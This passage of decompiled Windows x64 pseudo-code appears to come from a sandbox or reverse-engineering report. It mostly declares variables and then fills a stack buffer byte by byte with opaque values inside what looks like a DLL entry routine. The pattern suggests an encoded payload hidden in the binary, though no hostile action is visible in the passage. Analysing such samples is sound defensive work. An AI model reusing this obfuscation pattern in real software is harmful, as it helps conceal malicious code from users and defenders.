                                                                                                        				char _v2205;
                                                                                                        				char _v2206;
                                                                                                        				char _v2207;
                                                                                                        				char _v2208;
                                                                                                        				char _v2209;
                                                                                                        				char _v2210;
                                                                                                        				char _v2211;
                                                                                                        				char _v2212;
                                                                                                        				char _v2213;
                                                                                                        				char _v2214;
                                                                                                        				char _v2215;
                                                                                                        				char _v2216;
                                                                                                        				char _v2217;
                                                                                                        				char _v2218;
                                                                                                        				char _v2219;
                                                                                                        				char _v2220;
                                                                                                        				char _v2221;
                                                                                                        				char _v2222;
                                                                                                        				char _v2223;
                                                                                                        				char _v2224;
                                                                                                        				char _v2225;
                                                                                                        				char _v2226;
                                                                                                        				char _v2227;
                                                                                                        				char _v2228;
                                                                                                        				char _v2229;
                                                                                                        				char _v2230;
                                                                                                        				char _v2231;
                                                                                                        				char _v2232;
                                                                                                        				char _v2233;
                                                                                                        				char _v2234;
                                                                                                        				char _v2235;
                                                                                                        				char _v2236;
                                                                                                        				char _v2237;
                                                                                                        				char _v2238;
                                                                                                        				char _v2239;
                                                                                                        				char _v2240;
                                                                                                        				char _v2241;
                                                                                                        				char _v2242;
                                                                                                        				char _v2243;
                                                                                                        				char _v2244;
                                                                                                        				char _v2245;
                                                                                                        				char _v2246;
                                                                                                        				char _v2247;
                                                                                                        				char _v2248;
                                                                                                        				char _v2249;
                                                                                                        				char _v2250;
                                                                                                        				char _v2251;
                                                                                                        				char _v2252;
                                                                                                        				char _v2253;
                                                                                                        				char _v2254;
                                                                                                        				char _v2255;
                                                                                                        				char _v2256;
                                                                                                        				char _v2257;
                                                                                                        				char _v2258;
                                                                                                        				char _v2259;
                                                                                                        				char _v2260;
                                                                                                        				char _v2261;
                                                                                                        				char _v2262;
                                                                                                        				char _v2263;
                                                                                                        				char _v2264;
                                                                                                        				char _v2265;
                                                                                                        				char _v2266;
                                                                                                        				char _v2267;
                                                                                                        				char _v2268;
                                                                                                        				char _v2269;
                                                                                                        				char _v2270;
                                                                                                        				char _v2271;
                                                                                                        				char _v2272;
                                                                                                        				char _v2273;
                                                                                                        				char _v2274;
                                                                                                        				char _v2275;
                                                                                                        				char _v2276;
                                                                                                        				char _v2277;
                                                                                                        				char _v2278;
                                                                                                        				char _v2279;
                                                                                                        				char _v2280;
                                                                                                        				char _v2281;
                                                                                                        				char _v2282;
                                                                                                        				char _v2283;
                                                                                                        				char _v2284;
                                                                                                        				char _v2285;
                                                                                                        				char _v2286;
                                                                                                        				char _v2287;
                                                                                                        				char _v2288;
                                                                                                        				char _v2289;
                                                                                                        				char _v2290;
                                                                                                        				char _v2291;
                                                                                                        				char _v2292;
                                                                                                        				char _v2293;
                                                                                                        				char _v2294;
                                                                                                        				char _v2295;
                                                                                                        				char _v2296;
                                                                                                        				char _v2297;
                                                                                                        				char _v2298;
                                                                                                        				char _v2299;
                                                                                                        				char _v2300;
                                                                                                        				char _v2301;
                                                                                                        				char _v2302;
                                                                                                        				char _v2303;
                                                                                                        				char _v2304;
                                                                                                        				char _v2305;
                                                                                                        				char _v2306;
                                                                                                        				char _v2307;
                                                                                                        				char _v2308;
                                                                                                        				char _v2309;
                                                                                                        				char _v2310;
                                                                                                        				char _v2311;
                                                                                                        				char _v2312;
                                                                                                        				char _v2313;
                                                                                                        				char _v2314;
                                                                                                        				char _v2315;
                                                                                                        				char _v2316;
                                                                                                        				char _v2317;
                                                                                                        				char _v2318;
                                                                                                        				char _v2319;
                                                                                                        				char _v2320;
                                                                                                        				char _v2321;
                                                                                                        				char _v2322;
                                                                                                        				char _v2323;
                                                                                                        				char _v2324;
                                                                                                        				char _v2325;
                                                                                                        				char _v2326;
                                                                                                        				char _v2327;
                                                                                                        				char _v2328;
                                                                                                        				char _v2329;
                                                                                                        				char _v2330;
                                                                                                        				char _v2331;
                                                                                                        				char _v2332;
                                                                                                        				char _v2333;
                                                                                                        				char _v2334;
                                                                                                        				char _v2335;
                                                                                                        				char _v2336;
                                                                                                        				char _v2337;
                                                                                                        				char _v2338;
                                                                                                        				char _v2339;
                                                                                                        				char _v2340;
                                                                                                        				char _v2341;
                                                                                                        				char _v2342;
                                                                                                        				char _v2343;
                                                                                                        				char _v2344;
                                                                                                        				char _v2345;
                                                                                                        				char _v2346;
                                                                                                        				char _v2347;
                                                                                                        				char _v2348;
                                                                                                        				char _v2349;
                                                                                                        				char _v2350;
                                                                                                        				char _v2351;
                                                                                                        				char _v2352;
                                                                                                        				char _v2353;
                                                                                                        				char _v2354;
                                                                                                        				char _v2355;
                                                                                                        				char _v2356;
                                                                                                        				char _v2357;
                                                                                                        				char _v2358;
                                                                                                        				char _v2359;
                                                                                                        				char _v2360;
                                                                                                        				char _v2361;
                                                                                                        				char _v2362;
                                                                                                        				char _v2363;
                                                                                                        				char _v2364;
                                                                                                        				char _v2365;
                                                                                                        				char _v2366;
                                                                                                        				char _v2367;
                                                                                                        				char _v2368;
                                                                                                        				char _v2369;
                                                                                                        				char _v2370;
                                                                                                        				char _v2371;
                                                                                                        				char _v2372;
                                                                                                        				char _v2373;
                                                                                                        				char _v2374;
                                                                                                        				char _v2375;
                                                                                                        				char _v2376;
                                                                                                        				char _v2377;
                                                                                                        				char _v2378;
                                                                                                        				char _v2379;
                                                                                                        				char _v2380;
                                                                                                        				char _v2381;
                                                                                                        				char _v2382;
                                                                                                        				char _v2383;
                                                                                                        				char _v2384;
                                                                                                        				char _v2385;
                                                                                                        				char _v2386;
                                                                                                        				char _v2387;
                                                                                                        				char _v2388;
                                                                                                        				char _v2389;
                                                                                                        				char _v2390;
                                                                                                        				char _v2391;
                                                                                                        				char _v2392;
                                                                                                        				char _v2393;
                                                                                                        				char _v2394;
                                                                                                        				char _v2395;
                                                                                                        				char _v2396;
                                                                                                        				char _v2397;
                                                                                                        				char _v2398;
                                                                                                        				char _v2399;
                                                                                                        				char _v2400;
                                                                                                        				char _v2401;
                                                                                                        				char _v2402;
                                                                                                        				char _v2403;
                                                                                                        				char _v2404;
                                                                                                        				char _v2405;
                                                                                                        				char _v2406;
                                                                                                        				char _v2407;
                                                                                                        				char _v2408;
                                                                                                        				char _v2409;
                                                                                                        				char _v2410;
                                                                                                        				char _v2411;
                                                                                                        				char _v2412;
                                                                                                        				char _v2413;
                                                                                                        				char _v2414;
                                                                                                        				char _v2415;
                                                                                                        				char _v2416;
                                                                                                        				char _v2417;
                                                                                                        				char _v2418;
                                                                                                        				char _v2419;
                                                                                                        				char _v2420;
                                                                                                        				char _v2421;
                                                                                                        				char _v2422;
                                                                                                        				char _v2423;
                                                                                                        				char _v2424;
                                                                                                        				char _v2425;
                                                                                                        				char _v2426;
                                                                                                        				char _v2427;
                                                                                                        				char _v2428;
                                                                                                        				char _v2429;
                                                                                                        				char _v2430;
                                                                                                        				char _v2431;
                                                                                                        				char _v2432;
                                                                                                        				char _v2433;
                                                                                                        				char _v2434;
                                                                                                        				char _v2435;
                                                                                                        				char _v2436;
                                                                                                        				char _v2437;
                                                                                                        				char _v2438;
                                                                                                        				char _v2439;
                                                                                                        				char _v2440;
                                                                                                        				char _v2441;
                                                                                                        				char _v2442;
                                                                                                        				char _v2443;
                                                                                                        				char _v2444;
                                                                                                        				char _v2445;
                                                                                                        				char _v2446;
                                                                                                        				char _v2447;
                                                                                                        				char _v2448;
                                                                                                        				char _v2449;
                                                                                                        				char _v2450;
                                                                                                        				char _v2451;
                                                                                                        				char _v2452;
                                                                                                        				char _v2453;
                                                                                                        				char _v2454;
                                                                                                        				char _v2455;
                                                                                                        				char _v2456;
                                                                                                        				char _v2457;
                                                                                                        				char _v2458;
                                                                                                        				char _v2459;
                                                                                                        				char _v2460;
                                                                                                        				char _v2461;
                                                                                                        				char _v2462;
                                                                                                        				char _v2463;
                                                                                                        				char _v2464;
                                                                                                        				char _v2465;
                                                                                                        				char _v2466;
                                                                                                        				char _v2467;
                                                                                                        				char _v2468;
                                                                                                        				char _v2469;
                                                                                                        				char _v2470;
                                                                                                        				char _v2471;
                                                                                                        				char _v2472;
                                                                                                        				char _v2473;
                                                                                                        				char _v2474;
                                                                                                        				char _v2475;
                                                                                                        				char _v2476;
                                                                                                        				char _v2477;
                                                                                                        				char _v2478;
                                                                                                        				char _v2479;
                                                                                                        				char _v2480;
                                                                                                        				char _v2481;
                                                                                                        				char _v2482;
                                                                                                        				char _v2483;
                                                                                                        				char _v2484;
                                                                                                        				char _v2485;
                                                                                                        				char _v2486;
                                                                                                        				char _v2487;
                                                                                                        				char _v2488;
                                                                                                        				char _v2489;
                                                                                                        				char _v2490;
                                                                                                        				char _v2491;
                                                                                                        				char _v2492;
                                                                                                        				char _v2493;
                                                                                                        				char _v2494;
                                                                                                        				char _v2495;
                                                                                                        				char _v2496;
                                                                                                        				char _v2497;
                                                                                                        				char _v2498;
                                                                                                        				char _v2499;
                                                                                                        				char _v2500;
                                                                                                        				char _v2501;
                                                                                                        				char _v2502;
                                                                                                        				char _v2503;
                                                                                                        				char _v2504;
                                                                                                        				char _v2505;
                                                                                                        				char _v2506;
                                                                                                        				char _v2507;
                                                                                                        				char _v2508;
                                                                                                        				char _v2509;
                                                                                                        				char _v2510;
                                                                                                        				char _v2511;
                                                                                                        				char _v2512;
                                                                                                        				char _v2513;
                                                                                                        				char _v2514;
                                                                                                        				char _v2515;
                                                                                                        				char _v2516;
                                                                                                        				char _v2517;
                                                                                                        				char _v2518;
                                                                                                        				char _v2519;
                                                                                                        				char _v2520;
                                                                                                        				char _v2521;
                                                                                                        				char _v2522;
                                                                                                        				char _v2523;
                                                                                                        				char _v2524;
                                                                                                        				char _v2525;
                                                                                                        				char _v2526;
                                                                                                        				char _v2527;
                                                                                                        				char _v2528;
                                                                                                        				char _v2529;
                                                                                                        				char _v2530;
                                                                                                        				char _v2531;
                                                                                                        				char _v2532;
                                                                                                        				char _v2533;
                                                                                                        				char _v2534;
                                                                                                        				char _v2535;
                                                                                                        				char _v2536;
                                                                                                        				char _v2537;
                                                                                                        				char _v2538;
                                                                                                        				char _v2539;
                                                                                                        				char _v2540;
                                                                                                        				char _v2541;
                                                                                                        				char _v2542;
                                                                                                        				char _v2543;
                                                                                                        				char _v2544;
                                                                                                        				char _v2545;
                                                                                                        				char _v2546;
                                                                                                        				char _v2547;
                                                                                                        				char _v2548;
                                                                                                        				char _v2549;
                                                                                                        				char _v2550;
                                                                                                        				char _v2551;
                                                                                                        				char _v2552;
                                                                                                        				char _v2553;
                                                                                                        				char _v2554;
                                                                                                        				char _v2555;
                                                                                                        				char _v2556;
                                                                                                        				char _v2557;
                                                                                                        				char _v2558;
                                                                                                        				char _v2559;
                                                                                                        				char _v2560;
                                                                                                        				char _v2561;
                                                                                                        				char _v2562;
                                                                                                        				char _v2563;
                                                                                                        				char _v2564;
                                                                                                        				char _v2565;
                                                                                                        				char _v2566;
                                                                                                        				char _v2567;
                                                                                                        				char _v2568;
                                                                                                        				char _v2569;
                                                                                                        				char _v2570;
                                                                                                        				char _v2571;
                                                                                                        				char _v2572;
                                                                                                        				char _v2573;
                                                                                                        				char _v2574;
                                                                                                        				char _v2575;
                                                                                                        				char _v2576;
                                                                                                        				char _v2577;
                                                                                                        				char _v2578;
                                                                                                        				char _v2579;
                                                                                                        				char _v2580;
                                                                                                        				char _v2581;
                                                                                                        				char _v2582;
                                                                                                        				char _v2583;
                                                                                                        				char _v2584;
                                                                                                        				char _v2585;
                                                                                                        				char _v2586;
                                                                                                        				char _v2587;
                                                                                                        				char _v2588;
                                                                                                        				char _v2589;
                                                                                                        				char _v2590;
                                                                                                        				char _v2591;
                                                                                                        				char _v2592;
                                                                                                        				char _v2593;
                                                                                                        				char _v2594;
                                                                                                        				char _v2595;
                                                                                                        				char _v2596;
                                                                                                        				char _v2597;
                                                                                                        				char _v2598;
                                                                                                        				char _v2599;
                                                                                                        				char _v2600;
                                                                                                        				char _v2601;
                                                                                                        				char _v2602;
                                                                                                        				char _v2603;
                                                                                                        				char _v2604;
                                                                                                        				char _v2605;
                                                                                                        				char _v2606;
                                                                                                        				char _v2607;
                                                                                                        				char _v2608;
                                                                                                        				char _v2609;
                                                                                                        				char _v2610;
                                                                                                        				char _v2611;
                                                                                                        				char _v2612;
                                                                                                        				char _v2613;
                                                                                                        				char _v2614;
                                                                                                        				char _v2615;
                                                                                                        				char _v2616;
                                                                                                        				char _v2617;
                                                                                                        				char _v2618;
                                                                                                        				char _v2619;
                                                                                                        				char _v2620;
                                                                                                        				char _v2621;
                                                                                                        				char _v2622;
                                                                                                        				char _v2623;
                                                                                                        				char _v2624;
                                                                                                        				char _v2625;
                                                                                                        				char _v2626;
                                                                                                        				char _v2627;
                                                                                                        				char _v2628;
                                                                                                        				char _v2629;
                                                                                                        				char _v2630;
                                                                                                        				char _v2631;
                                                                                                        				char _v2632;
                                                                                                        				char _v2672;
                                                                                                        				char _v2704;
                                                                                                        				void* _v2736;
                                                                                                        				char _v2752;
                                                                                                        				signed long long _v2760;
                                                                                                        				long long _v2768;
                                                                                                        				char _v2776;
                                                                                                        				signed int _v2780;
                                                                                                        				intOrPtr _v2784;
                                                                                                        				signed long long _v2792;
                                                                                                        				signed char _v2796;
                                                                                                        				signed char _v2800;
                                                                                                        				signed char _v2804;
                                                                                                        				signed char _v2808;
                                                                                                        				signed int _t2669;
                                                                                                        				signed long long _t2714;
                                                                                                        				signed long long _t2715;
                                                                                                        				long long _t2716;
                                                                                                        				signed long long _t2748;
                                                                                                        
                                                                                                        				_t2746 = __rdi;
                                                                                                        				_t2703 = __edi;
                                                                                                        				_a24 = __r8;
                                                                                                        				_a16 = __edx;
                                                                                                        				_a8 = __rcx;
                                                                                                        				_t2714 =  *0x1244e008; // 0xbe8d44b92f09
                                                                                                        				_t2715 = _t2714 ^ _t2748;
                                                                                                        				_v24 = _t2715;
                                                                                                        				_v2784 = _a16;
                                                                                                        				if (_v2784 == 1) goto 0x123e3fee;
                                                                                                        				goto 0x123e93e5;
                                                                                                        				_v2796 = 0;
                                                                                                        				_v2800 = 0;
                                                                                                        				_v2768 = 0;
                                                                                                        				_v2792 = 0;
                                                                                                        				E00007FFC7FFC123D97DC(_a16, __rcx); // executed
                                                                                                        				_v2792 = _t2715;
                                                                                                        				if (_v2792 == 0) goto 0x123e4039;
                                                                                                        				r8d = 0x5f5e100;
                                                                                                        				E00007FFC7FFC123D6920(0x5f5e100, 0, __edi, __esp, _v2792, __rdx, __rdi, __r8);
                                                                                                        				E00007FFC7FFC123D93A8(_t2715, __rbx, _v2792, __rsi); // executed
                                                                                                        				 *0x1244ea20 = 0;
                                                                                                        				 *0x1244ea14 = 0;
                                                                                                        				 *0x1244ea24 = 0;
                                                                                                        				 *0x1244ea18 = 0;
                                                                                                        				 *0x1244ea1c = 0;
                                                                                                        				 *0x1244ea10 = 0;
                                                                                                        				_v2632 = 0x62;
                                                                                                        				_v2631 = 0xfa;
                                                                                                        				_v2630 = 0x28;
                                                                                                        				_v2629 = 0x18;
                                                                                                        				_v2628 = 0x56;
                                                                                                        				_v2627 = 0x18;
                                                                                                        				_v2626 = 0x3d;
                                                                                                        				_v2625 = 0x31;
                                                                                                        				_v2624 = 0x39;
                                                                                                        				_v2623 = 0x13;
                                                                                                        				_v2622 = 0x33;
                                                                                                        				_v2621 = 9;
                                                                                                        				_v2620 = 5;
                                                                                                        				_v2619 = 0x64;
                                                                                                        				_v2618 = 0x18;
                                                                                                        				_v2617 = 0x2d;
                                                                                                        				_v2616 = 0x39;
                                                                                                        				_v2615 = 0x32;
                                                                                                        				_v2614 = 0xae;
                                                                                                        				_v2613 = 0x33;
                                                                                                        				_v2612 = 2;
                                                                                                        				_v2611 = 0xdc;
                                                                                                        				_v2610 = 0xf;
                                                                                                        				_v2609 = 0xd9;
                                                                                                        				_v2608 = 0x8a;
                                                                                                        				_v2607 = 0x2c;
                                                                                                        				_v2606 = 0x45;
                                                                                                        				_v2605 = 0x26;
                                                                                                        				_v2604 = 0x3c;
                                                                                                        				_v2603 = 0x60;
                                                                                                        				_v2602 = 0x69;
                                                                                                        				_v2601 = 0xdb;
                                                                                                        				_v2600 = 0x9e;
                                                                                                        				_v2599 = 0x2e;
                                                                                                        				_v2598 = 0xd5;
                                                                                                        				_v2597 = 0x26;
                                                                                                        				_v2596 = 0x26;
                                                                                                        				_v2595 = 0x30;
                                                                                                        				_v2594 = 0x3f;
                                                                                                        				_v2593 = 0x22;
                                                                                                        				_v2592 = 0xe6;
                                                                                                        				_v2591 = 0xce;
                                                                                                        				_v2590 = 0x3c;
                                                                                                        				_v2589 = 0xe6;
                                                                                                        				_v2588 = 0x4c;
                                                                                                        				_v2587 = 0xd5;
                                                                                                        				_v2586 = 0xb9;
                                                                                                        				_v2585 = 0x39;
                                                                                                        				_v2584 = 0xef;
                                                                                                        				_v2583 = 0xdb;
                                                                                                        				_v2582 = 0x81;
                                                                                                        				_v2581 = 0x12;
                                                                                                        				_v2580 = 0xc4;
                                                                                                        				_v2579 = 0xb;
                                                                                                        				_v2578 = 0xd7;
                                                                                                        				_v2577 = 0x22;
                                                                                                        				_v2576 = 0xdb;
                                                                                                        				_v2575 = 2;
                                                                                                        				_v2574 = 0xb8;
                                                                                                        				_v2573 = 0x15;
                                                                                                        				_v2572 = 0xa8;
                                                                                                        				_v2571 = 2;
                                                                                                        				_v2570 = 0x48;
                                                                                                        				_v2569 = 0xb;
                                                                                                        				_v2568 = 0x36;
                                                                                                        				_v2567 = 0xaa;
                                                                                                        				_v2566 = 0x3a;
                                                                                                        				_v2565 = 0xde;
                                                                                                        				_v2564 = 0x30;
                                                                                                        				_v2563 = 0xcf;
                                                                                                        				_v2562 = 0x15;
                                                                                                        				_v2561 = 0xca;
                                                                                                        				_v2560 = 0x30;
                                                                                                        				_v2559 = 0xcc;
                                                                                                        				_v2558 = 0x6b;
                                                                                                        				_v2557 = 0xae;
                                                                                                        				_v2556 = 0x69;
                                                                                                        				_v2555 = 0xd3;
                                                                                                        				_v2554 = 0x5a;
                                                                                                        				_v2553 = 0xb1;
                                                                                                        				_v2552 = 0x27;
                                                                                                        				_v2551 = 0xe4;
                                                                                                        				_v2550 = 0x28;
                                                                                                        				_v2549 = 0xf6;
                                                                                                        				_v2548 = 0x19;
                                                                                                        				_v2547 = 0xb6;
                                                                                                        				_v2546 = 0xf;
                                                                                                        				_v2545 = 0x65;
                                                                                                        				_v2544 = 0x7b;
                                                                                                        				_v2543 = 0xf9;
                                                                                                        				_v2542 = 0xa;
                                                                                                        				_v2541 = 0x3d;
                                                                                                        				_v2540 = 0x71;
                                                                                                        				_v2539 = 0x89;
                                                                                                        				_v2538 = 0x4e;
                                                                                                        				_v2537 = 0x57;
                                                                                                        				_v2536 = 0x40;
                                                                                                        				_v2535 = 0xfb;
                                                                                                        				_v2534 = 0x1b;
                                                                                                        				_v2533 = 0xf1;
                                                                                                        				_v2532 = 0x1c;
                                                                                                        				_v2531 = 0x67;
                                                                                                        				_v2530 = 0;
                                                                                                        				_v2529 = 0x52;
                                                                                                        				_v2528 = 0xa0;
                                                                                                        				_v2527 = 0xd;
                                                                                                        				_v2526 = 0x90;
                                                                                                        				_v2525 = 0x40;
                                                                                                        				_v2524 = 0x4e;
                                                                                                        				_v2523 = 0;
                                                                                                        				_v2522 = 0x6e;
                                                                                                        				_v2521 = 0xbd;
                                                                                                        				_v2520 = 0x66;
                                                                                                        				_v2519 = 0x9b;
                                                                                                        				_v2518 = 0x15;
                                                                                                        				_v2517 = 0x74;
                                                                                                        				_v2516 = 0x75;
                                                                                                        				_v2515 = 0x58;
                                                                                                        				_v2514 = 0xa1;
                                                                                                        				_v2513 = 0x31;
                                                                                                        				_v2512 = 0x8c;
                                                                                                        				_v2511 = 8;
                                                                                                        				_v2510 = 0x3c;
                                                                                                        				_v2509 = 0x41;
                                                                                                        				_v2508 = 0x5a;
                                                                                                        				_v2507 = 0xf8;
                                                                                                        				_v2506 = 0x1c;
                                                                                                        				_v2505 = 0xa7;
                                                                                                        				_v2504 = 1;
                                                                                                        				_v2503 = 0x4d;
                                                                                                        				_v2502 = 0x4a;
                                                                                                        				_v2501 = 0x55;
                                                                                                        				_v2500 = 0xf8;
                                                                                                        				_v2499 = 0xef;
                                                                                                        				_v2498 = 0xd5;
                                                                                                        				_v2497 = 0x3f;
                                                                                                        				_v2496 = 0x70;
                                                                                                        				_v2495 = 0x6f;
                                                                                                        				_v2494 = 0x7a;
                                                                                                        				_v2493 = 0x59;
                                                                                                        				_v2492 = 0x65;
                                                                                                        				_v2491 = 0x4f;
                                                                                                        				_v2490 = 0xb5;
                                                                                                        				_v2489 = 0xe1;
                                                                                                        				_v2488 = 0x80;
                                                                                                        				_v2487 = 0x5e;
                                                                                                        				_v2486 = 0x4d;
                                                                                                        				_v2485 = 0x6e;
                                                                                                        				_v2484 = 0x17;
                                                                                                        				_v2483 = 0xa9;
                                                                                                        				_v2482 = 0x16;
                                                                                                        				_v2481 = 0x43;
                                                                                                        				_v2480 = 0;
                                                                                                        				_v2479 = 0x1c;
                                                                                                        				_v2478 = 0x4a;
                                                                                                        				_v2477 = 0x2f;
                                                                                                        				_v2476 = 8;
                                                                                                        				_v2475 = 0xa9;
                                                                                                        				_v2474 = 0x3e;
                                                                                                        				_v2473 = 7;
                                                                                                        				_v2472 = 0x13;
                                                                                                        				_v2471 = 0x6a;
                                                                                                        				_v2470 = 0x1d;
                                                                                                        				_v2469 = 0x25;
                                                                                                        				_v2468 = 0x2a;
                                                                                                        				_v2467 = 0xa1;
                                                                                                        				_v2466 = 0x30;
                                                                                                        				_v2465 = 0x60;
                                                                                                        				_v2464 = 0x76;
                                                                                                        				_v2463 = 0x5d;
                                                                                                        				_v2462 = 0x57;
                                                                                                        				_v2461 = 0x23;
                                                                                                        				_v2460 = 0x7e;
                                                                                                        				_v2459 = 0x9e;
                                                                                                        				_v2458 = 0x2f;
                                                                                                        				_v2457 = 0x49;
                                                                                                        				_v2456 = 0x75;
                                                                                                        				_v2455 = 0x70;
                                                                                                        				_v2454 = 0x3c;
                                                                                                        				_v2453 = 0x4d;
                                                                                                        				_v2452 = 0x1e;
                                                                                                        				_v2451 = 0xaa;
                                                                                                        				_v2450 = 0x7b;
                                                                                                        				_v2449 = 0x54;
                                                                                                        				_v2448 = 0x53;
                                                                                                        				_v2447 = 0x5c;
                                                                                                        				_v2446 = 0x54;
                                                                                                        				_v2445 = 0x6c;
                                                                                                        				_v2444 = 0x6b;
                                                                                                        				_v2443 = 0xb4;
                                                                                                        				_v2442 = 0x20;
                                                                                                        				_v2441 = 0x18;
                                                                                                        				_v2440 = 0x1e;
                                                                                                        				_v2439 = 0x21;
                                                                                                        				_v2438 = 2;
                                                                                                        				_v2437 = 8;
                                                                                                        				_v2436 = 0xd;
                                                                                                        				_v2435 = 0x95;
                                                                                                        				_v2434 = 0x23;
                                                                                                        				_v2433 = 0x6c;
                                                                                                        				_v2432 = 8;
                                                                                                        				_v2431 = 0x73;
                                                                                                        				_v2430 = 0x27;
                                                                                                        				_v2429 = 0x1e;
                                                                                                        				_v2428 = 0x1a;
                                                                                                        				_v2427 = 0xbd;
                                                                                                        				_v2426 = 0x67;
                                                                                                        				_v2425 = 0x7b;
                                                                                                        				_v2424 = 0x7a;
                                                                                                        				_v2423 = 1;
                                                                                                        				_v2422 = 0x26;
                                                                                                        				_v2421 = 0x34;
                                                                                                        				_v2420 = 0x36;
                                                                                                        				_v2419 = 0xb3;
                                                                                                        				_v2418 = 0;
                                                                                                        				_v2417 = 2;
                                                                                                        				_v2416 = 0x5c;
                                                                                                        				_v2415 = 0x57;
                                                                                                        				_v2414 = 0x35;
                                                                                                        				_v2413 = 0x4b;
                                                                                                        				_v2412 = 0x3c;
                                                                                                        				_v2411 = 0xd;
                                                                                                        				_v2410 = 0xaa;
                                                                                                        				_v2409 = 9;
                                                                                                        				_v2408 = 2;
                                                                                                        				_v2407 = 0x31;
                                                                                                        				_v2406 = 0x5c;
                                                                                                        				_v2405 = 0x1e;
                                                                                                        				_v2404 = 0xaa;
                                                                                                        				_v2403 = 0x7a;
                                                                                                        				_v2402 = 0xe8;
                                                                                                        				_v2401 = 0x29;
                                                                                                        				_v2400 = 0x45;
                                                                                                        				_v2399 = 0x40;
                                                                                                        				_v2398 = 0x73;
                                                                                                        				_v2397 = 0xed;
                                                                                                        				_v2396 = 0x36;
                                                                                                        				_v2395 = 0xf8;
                                                                                                        				_v2394 = 0x54;
                                                                                                        				_v2393 = 0x17;
                                                                                                        				_v2392 = 0x23;
                                                                                                        				_v2391 = 0x1d;
                                                                                                        				_v2390 = 0xa0;
                                                                                                        				_v2389 = 0x2b;
                                                                                                        				_v2388 = 0xf2;
                                                                                                        				_v2387 = 0x13;
                                                                                                        				_v2386 = 0x3a;
                                                                                                        				_v2385 = 0x25;
                                                                                                        				_v2384 = 0x46;
                                                                                                        				_v2383 = 0x89;
                                                                                                        				_v2382 = 0x29;
                                                                                                        				_v2381 = 0xca;
                                                                                                        				_v2380 = 0xe;
                                                                                                        				_v2379 = 0x4a;
                                                                                                        				_v2378 = 0x30;
                                                                                                        				_v2377 = 0x48;
                                                                                                        				_v2376 = 0xb3;
                                                                                                        				_v2375 = 2;
                                                                                                        				_v2374 = 0xf0;
                                                                                                        				_v2373 = 0x25;
                                                                                                        				_v2372 = 0x15;
                                                                                                        				_v2371 = 0x27;
                                                                                                        				_v2370 = 0x4e;
                                                                                                        				_v2369 = 0xfb;
                                                                                                        				_v2368 = 0x61;
                                                                                                        				_v2367 = 0x7e;
                                                                                                        				_v2366 = 0x57;
                                                                                                        				_v2365 = 0x1e;
                                                                                                        				_v2364 = 0xe;
                                                                                                        				_v2363 = 0x19;
                                                                                                        				_v2362 = 3;
                                                                                                        				_v2361 = 0xe1;
                                                                                                        				_v2360 = 0x11;
                                                                                                        				_v2359 = 0x1b;
                                                                                                        				_v2358 = 6;
                                                                                                        				_v2357 = 0xc;
                                                                                                        				_v2356 = 0x4b;
                                                                                                        				_v2355 = 0x19;
                                                                                                        				_v2354 = 0x19;
                                                                                                        				_v2353 = 0xee;
                                                                                                        				_v2352 = 0x71;
                                                                                                        				_v2351 = 0x24;
                                                                                                        				_v2350 = 0x5a;
                                                                                                        				_v2349 = 0x16;
                                                                                                        				_v2348 = 0x37;
                                                                                                        				_v2347 = 0x45;
                                                                                                        				_v2346 = 0x2d;
                                                                                                        				_v2345 = 0x8a;
                                                                                                        				_v2344 = 0x2a;
                                                                                                        				_v2343 = 0x43;
                                                                                                        				_v2342 = 0x1a;
                                                                                                        				_v2341 = 0x26;
                                                                                                        				_v2340 = 2;
                                                                                                        				_v2339 = 0x25;
                                                                                                        				_v2338 = 0x19;
                                                                                                        				_v2337 = 0x43;
                                                                                                        				_v2336 = 0x89;
                                                                                                        				_v2335 = 0x28;
                                                                                                        				_v2334 = 0x4a;
                                                                                                        				_v2333 = 2;
                                                                                                        				_v2332 = 0x4d;
                                                                                                        				_v2331 = 0x39;
                                                                                                        				_v2330 = 0xe0;
                                                                                                        				_v2329 = 0x30;
                                                                                                        				_v2328 = 0x63;
                                                                                                        				_v2327 = 0x22;
                                                                                                        				_v2326 = 9;
                                                                                                        				_v2325 = 0xb3;
                                                                                                        				_v2324 = 1;
                                                                                                        				_v2323 = 0xa6;
                                                                                                        				_v2322 = 0x6e;
                                                                                                        				_v2321 = 0x51;
                                                                                                        				_v2320 = 0x36;
                                                                                                        				_v2319 = 0x7e;
                                                                                                        				_v2318 = 0x9e;
                                                                                                        				_v2317 = 0x2e;
                                                                                                        				_v2316 = 0xe9;
                                                                                                        				_v2315 = 0x29;
                                                                                                        				_v2314 = 0x42;
                                                                                                        				_v2313 = 0x13;
                                                                                                        				_v2312 = 0x4a;
                                                                                                        				_v2311 = 0xad;
                                                                                                        				_v2310 = 0x28;
                                                                                                        				_v2309 = 0xb7;
                                                                                                        				_v2308 = 0x1e;
                                                                                                        				_v2307 = 0xc;
                                                                                                        				_v2306 = 0x5d;
                                                                                                        				_v2305 = 0x5c;
                                                                                                        				_v2304 = 0xc7;
                                                                                                        				_v2303 = 0x6f;
                                                                                                        				_v2302 = 0xff;
                                                                                                        				_v2301 = 0xb;
                                                                                                        				_v2300 = 0x52;
                                                                                                        				_v2299 = 0xa;
                                                                                                        				_v2298 = 0x2c;
                                                                                                        				_v2297 = 8;
                                                                                                        				_v2296 = 0xa0;
                                                                                                        				_v2295 = 0x2b;
                                                                                                        				_v2294 = 0xc2;
                                                                                                        				_v2293 = 5;
                                                                                                        				_v2292 = 0x24;
                                                                                                        				_v2291 = 0xb8;
                                                                                                        				_v2290 = 0xe7;
                                                                                                        				_v2289 = 0x49;
                                                                                                        				_v2288 = 0x6c;
                                                                                                        				_v2287 = 0x6e;
                                                                                                        				_v2286 = 0xc3;
                                                                                                        				_v2285 = 0x96;
                                                                                                        				_v2284 = 0x1e;
                                                                                                        				_v2283 = 0xff;
                                                                                                        				_v2282 = 0x2a;
                                                                                                        				_v2281 = 0xf;
                                                                                                        				_v2280 = 0xd3;
                                                                                                        				_v2279 = 0xbe;
                                                                                                        				_v2278 = 0x9c;
                                                                                                        				_v2277 = 0xf1;
                                                                                                        				_v2276 = 0x21;
                                                                                                        				_v2275 = 0x3c;
                                                                                                        				_v2274 = 0x25;
                                                                                                        				_v2273 = 0x16;
                                                                                                        				_v2272 = 0xb4;
                                                                                                        				_v2271 = 0xb1;
                                                                                                        				_v2270 = 0x23;
                                                                                                        				_v2269 = 0xe4;
                                                                                                        				_v2268 = 8;
                                                                                                        				_v2267 = 0xfe;
                                                                                                        				_v2266 = 0x1d;
                                                                                                        				_v2265 = 0xb2;
                                                                                                        				_v2264 = 0x2f;
                                                                                                        				_v2263 = 0xd5;
                                                                                                        				_v2262 = 0xf8;
                                                                                                        				_v2261 = 0x35;
                                                                                                        				_v2260 = 0x7f;
